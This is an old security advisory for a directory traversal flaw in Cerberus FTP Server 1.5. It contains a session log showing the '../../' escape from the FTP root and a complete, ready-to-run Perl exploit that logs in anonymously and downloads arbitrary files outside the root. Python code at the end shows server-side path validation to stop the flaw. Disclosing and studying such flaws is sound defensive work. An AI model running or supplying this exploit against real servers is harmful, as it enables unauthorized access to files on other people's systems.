Directory Traversal Vulnerability in the Cerberus FTP Server

Published: 2001-08-22
Updated: 2001-08-22
Severity: High
Threat level: Remote unauthorized file access
Error type: Input validation error
Exploitation method: Server mode

Affected systems

Cerberus FTP Server version 1.5

Detailed description

Cerberus FTP (http://www.greenepa.net/~averett/cerberus.htm) is a multithreaded FTP server for Windows that uses little CPU and memory. It contains a security vulnerability that allows an attacker to bypass the FTP root directory restriction.

Test code

    220-Welcome to Cerberus FTP Server
    220 Created by Grant Averett
    Benutzer (192.168.0.2:(none)): anonymous
    230 User anonymous logged in
    ftp> ls
    200 Port command received
    150 Opening data connection
    delphiown
    226 Transfer complete
    FTP: 11 Bytes empfangen in 0,00Sekunden 11000,00KB/s
    ftp> cd delphiown/../../
    250 Change directory ok
    ftp> ls
    200 Port command received
    150 Opening data connection

    #!/usr/bin/perl
    # this exploit will download files from
    # the ftp server, even if they are outside of
    # root directory.
    use Net::FTP;

    $loginname='anonymous';
    $passwd='';
    $dirname= '';

    print "\n-----------------------------------\n";
    print "Cerberus Ftp server 1.5\n";
    print "directory traversal exploit\n";
    print "by Christoph Heindl\n";
    print "se00020\@fhs-hagenberg.ac.at\n";
    print "-----------------------------------\n";

    if (!$ARGV[0] || !$ARGV[1]){
        print "usage: cftpsploit.pl <host> <dir/file>\n";
        print " example: cftpsploit.pl 192.168.0.2 boot.ini\n";
        print " will download boot.ini from c:\\ if server is running on drive c\n";
        exit;
    }

    $ipaddr=$ARGV[0];
    $ftp=Net::FTP->new($ipaddr, Timeout=>5);
    if (!$ftp->login($loginname, $passwd)){
        die "\ncould not login\n";
    }

    # find an existing directory below the FTP root
    print "searching for directory...";
    foreach $dir ($ftp->ls()) {
        next unless ($ftp->cwd($dir));
        $dirname=$dir;
        $ftp->cwd('..');
    }

    # none found: try to create one
    if ($dirname eq '') {
        print "failed\n";
        print "trying to create pseudo dir...";
        $mkd=$ftp->mkdir('pseudo');
        if ($mkd) {
            print "ok\n";
            $dirname="pseudo";
        } else {
            print "failed\n";
            print "exiting...\n";
            exit(0);
        }
    }

    print "found dir\n";
    print "dirname is: ".$dirname."\n";

    # <dir>/../../ resolves above the FTP root on the server
    $pathtofile=$dirname."/../../";
    print "getting file...\n";
    $ftp->get($pathtofile.$ARGV[1]);
    $ftp->quit;
    print "all done. \nfile located in current dir";

Solution

None yet.

Related information

Christoph.Heindl at fhs-hagenberg.ac.at
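The `cd delphiown/../../` step in the session above succeeds because the server accepts a path whose `..` components climb past the FTP root. The following is an added example, not code from the advisory or from Cerberus: a sketch of how a server-side resolver can refuse such paths, next to the naive join that allows them. The root `C:\ftproot` and all function names are assumptions made for the illustration.

```python
import ntpath
import re

ROOT = r"C:\ftproot"  # constructed FTP root, one level below the drive root


class PathEscape(Exception):
    """Raised when a client path would leave the FTP root."""


def naive_real(root, cwd_parts, arg):
    # Vulnerable pattern: join and normalise, but never re-check the result
    # against the root, so "dir/../../" silently walks above it.
    return ntpath.normpath(ntpath.join(root, *cwd_parts, arg))


def resolve_virtual(cwd_parts, arg):
    """Apply a client path to the virtual cwd; returns components below root."""
    if "\x00" in arg or ":" in arg:  # no NULs, drive letters or stream names
        raise PathEscape("illegal character in path")
    # A leading separator means "relative to the FTP root", not the drive.
    parts = [] if arg[:1] in ("/", "\\") else list(cwd_parts)
    for comp in re.split(r"[\\/]+", arg):  # Windows accepts both separators
        if comp in ("", "."):
            continue
        if comp == "..":
            if not parts:  # already at the root: refuse instead of clamping
                raise PathEscape("'..' above FTP root")
            parts.pop()
        elif comp.endswith((".", " ")):
            # Conservative: Win32 may strip trailing dots/spaces ("...", ".. ")
            raise PathEscape("ambiguous component")
        else:
            parts.append(comp)
    return parts


def to_real(root, parts):
    """Map validated components to a real path and re-check containment."""
    real = ntpath.normpath(ntpath.join(root, *parts))
    base = ntpath.normcase(ntpath.normpath(root))
    if ntpath.normcase(real) != base and not ntpath.normcase(real).startswith(base + "\\"):
        raise PathEscape("resolved path outside FTP root")
    return real
```

String checks like these do not cover junctions or symbolic links that sit inside the root; those need a check on the path the filesystem actually resolves.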